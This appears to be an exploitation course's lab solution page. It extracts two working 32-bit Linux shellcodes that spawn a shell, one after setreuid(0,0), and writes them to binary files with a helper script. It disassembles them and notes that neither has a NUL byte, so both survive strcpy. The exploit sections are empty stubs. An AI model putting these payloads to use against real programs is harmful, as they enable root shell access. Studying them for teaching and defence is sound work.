Session 09 Solutions
Create and disassemble binary shellcodes
We extract the two shellcode byte strings from the given links (1, 2):
$ cat 216.print
\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff
$ cat 827.print
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
and then we use echo -en (-e interprets the \xHH escapes, -n suppresses the trailing newline, which would otherwise add a stray 0x0a byte) to generate two binary shellcode files:
$ echo -en '\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff' > 216.bin
$ echo -en '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' > 827.bin
Afterwards, we disassemble the binary shellcode files:
$ objdump -D -b binary -m i386 -M intel 827.bin

827.bin:     file format binary

Disassembly of section .data:

00000000 <.data>:
   0:   31 c0                   xor    eax,eax
   2:   50                      push   eax
   3:   68 2f 2f 73 68          push   0x68732f2f
   8:   68 2f 62 69 6e          push   0x6e69622f
   d:   89 e3                   mov    ebx,esp
   f:   50                      push   eax
  10:   53                      push   ebx
  11:   89 e1                   mov    ecx,esp
  13:   b0 0b                   mov    al,0xb
  15:   cd 80                   int    0x80

$ objdump -D -b binary -m i386 -M intel 216.bin

216.bin:     file format binary

Disassembly of section .data:

00000000 <.data>:
   0:   6a 46                   push   0x46
   2:   58                      pop    eax
   3:   31 db                   xor    ebx,ebx
   5:   31 c9                   xor    ecx,ecx
   7:   cd 80                   int    0x80
   9:   eb 21                   jmp    0x2c
   b:   5f                      pop    edi
   c:   6a 0b                   push   0xb
   e:   58                      pop    eax
   f:   99                      cdq
  10:   52                      push   edx
  11:   66 68 2d 63             pushw  0x632d
  15:   89 e6                   mov    esi,esp
  17:   52                      push   edx
  18:   68 2f 2f 73 68          push   0x68732f2f
  1d:   68 2f 62 69 6e          push   0x6e69622f
  22:   89 e3                   mov    ebx,esp
  24:   52                      push   edx
  25:   57                      push   edi
  26:   56                      push   esi
  27:   53                      push   ebx
  28:   89 e1                   mov    ecx,esp
  2a:   cd 80                   int    0x80
  2c:   e8 da ff ff ff          call   0xb
and we compare the resulting assembly listings to the ones on the original pages. They are identical, confirming that the binary shellcode files were generated and disassembled correctly.

A few things can be read off the disassembly itself. 827.bin is 23 bytes (0x17) and 216.bin is 49 bytes (0x31); neither contains a 0x00 byte, so both survive being copied by strcpy(). 827.bin only performs execve("/bin//sh", ["/bin//sh", NULL], NULL) (eax = 0xb = 11). 216.bin first calls setreuid(0, 0) (eax = 0x46 = 70, ebx = ecx = 0) and then builds argv as ["/bin//sh", "-c", edi, NULL]: the jmp 0x2c / call 0xb / pop edi sequence loads edi with the return address pushed by the call, which is offset 0x31, the byte immediately after the shellcode. 216.bin is therefore not self-contained: the command string for sh -c must be placed directly after these 49 bytes, and disassembling the bytes alone, as done here, does not show it.
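The procedure above (extract the escaped string, write the raw bytes, check them, disassemble), as an added example that is not part of the original solution. It uses printf with octal escapes instead of echo -en, because echo's handling of -e and -n is Bash-specific, and it adds the two checks a practitioner wants before using a shellcode: the byte count and the absence of 0x00 bytes. The two byte strings are the ones quoted on the page; the function names and the output paths under $TMPDIR are this example's own choices.

```shell
#!/bin/sh
# Added example, not code from the original page: build raw shellcode files from
# "\x.." strings portably, sanity-check them, and disassemble them as 32-bit x86.
#
# The two byte strings are the ones quoted on the page (shellcodes 216 and 827).
SC_216='\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff'
SC_827='\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'

# hexstr_to_bin STRING FILE
# Writes the bytes of a "\x6a\x46..." string to FILE and prints the byte count.
# printf with a \ddd octal escape is understood by every POSIX sh, unlike
# `echo -en`, so this works the same under bash, dash and busybox sh.
hexstr_to_bin() {
    hex=$(printf '%s' "$1" | sed 's/\\x//g')
    if [ $(( ${#hex} % 2 )) -ne 0 ]; then
        echo "hexstr_to_bin: odd number of hex digits" >&2
        return 1
    fi
    : > "$2"
    while [ -n "$hex" ]; do
        byte=${hex%"${hex#??}"}       # first two hex digits
        hex=${hex#??}                 # drop them
        printf "\\$(printf '%03o' "0x$byte")" >> "$2"
    done
    wc -c < "$2" | tr -d ' '
}

# count_nul FILE
# Prints how many 0x00 bytes FILE contains. A shellcode that reaches the target
# through strcpy() is cut at the first one, so the expected answer is 0.
count_nul() {
    od -An -v -tx1 "$1" | tr -s ' ' '\n' | grep -c '^00$' || true
}

# disas FILE
# Same objdump invocation as on the page: raw binary, 32-bit x86, Intel syntax.
disas() {
    objdump -D -b binary -m i386 -M intel "$1"
}

main() {
    out=${TMPDIR:-/tmp}           # assumption: output directory for the .bin files
    for name in 216 827; do
        if [ "$name" = 216 ]; then sc=$SC_216; else sc=$SC_827; fi
        size=$(hexstr_to_bin "$sc" "$out/$name.bin")
        echo "$name.bin: $size bytes, $(count_nul "$out/$name.bin") NUL bytes"
        if command -v objdump >/dev/null 2>&1; then
            disas "$out/$name.bin"
        else
            echo "objdump not found, skipping disassembly of $name.bin" >&2
        fi
    done
}

main "$@"
```

Running it prints "216.bin: 49 bytes, 0 NUL bytes" and "827.bin: 23 bytes, 0 NUL bytes" followed by the two objdump listings shown above. The odd-length check matters in practice: a shellcode string copied with a truncated last escape would otherwise silently produce a shorter, wrong binary.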
Call Trampoline
TODO
Exploit with Known Buffer Address
TODO
Brute-Forcing the Buffer Address
TODO
NOP Sled
TODO
Environment variables
TODO
session/solution/09.1436392771.txt.gz · Last modified: by Razvan Deaconescu